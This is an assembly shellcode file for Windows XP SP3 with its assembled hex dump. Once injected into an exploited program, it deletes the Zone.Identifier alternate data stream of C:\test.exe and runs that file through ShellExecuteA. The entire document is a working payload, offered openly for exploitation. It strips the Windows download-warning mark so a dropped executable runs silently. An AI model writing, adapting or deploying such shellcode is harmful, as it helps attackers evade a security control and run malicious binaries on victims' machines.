; Author: sinn3r ; Tested on Windows XP SP3 ; Description: ; This shellcode will attempt to delete the Zone.Identifier ADS (it's a ; trick Microsoft uses to warn you about an exe when you try to run it), ; and then run the file using the ShellExecuteA function. ; Make sure the exploited app has the following components loaded ; (should be pretty common): ; KERNEL32, msvcrt, SHELL32 [BITS 32] global _start _start: push 0x00657865 push 0x2e747365 push 0x745c3a43 xor edi, edi mov edi, esp ; edi = "C:\test.exe" xor esi, esi push 0x00004154 push 0x4144243a push 0x72656966 push 0x69746e65 push 0x64492e65 push 0x6e6f5a3a mov esi, esp ; edi = fork push esi push edi xor eax, eax mov eax, 0x77C46040 ; msvcrt.strcat (Windows XP SP3) call eax xor eax, eax mov eax, 0x7c831ec5 ; KERNEL32.DeleteFileA (Windows XP SP3) call eax xor edx, edx mov word [edi + 11], dx push edx push 0x6e65706f mov edx, esp ; edx = "open" xor eax, eax push eax ; IsShown = NULL push eax ; DefDir = NULL push eax ; Parameters = NULL push edi ; Filename push edx ; Operation = "open" push eax ; hwnd = NULL mov eax, 0x7ca41150 ; SHELL32.ShellExecuteA (Windows XP SP3) call eax ; shellcode: ; sinn3r@backtrack:~$ nasm -f bin shellexecute.asm -o shellexecute | cat shellexecute |hexdump -C |grep -v 00000066 ; 00000000 68 65 78 65 00 68 65 73 74 2e 68 43 3a 5c 74 31 |hexe.hest.hC:\t1| ; 00000010 ff 89 e7 31 f6 68 54 41 00 00 68 3a 24 44 41 68 |...1.hTA..h:$DAh| ; 00000020 66 69 65 72 68 65 6e 74 69 68 65 2e 49 64 68 3a |fierhentihe.Idh:| ; 00000030 5a 6f 6e 89 e6 56 57 31 c0 b8 40 60 c4 77 ff d0 |Zon..VW1..@`.w..| ; 00000040 31 c0 b8 c5 1e 83 7c ff d0 31 d2 66 89 57 0b 52 |1.....|..1.f.W.R| ; 00000050 68 6f 70 65 6e 89 e2 31 c0 50 50 50 57 52 50 b8 |hopen..1.PPPWRP.| ; 00000060 50 11 a4 7c ff d0 |P..|..|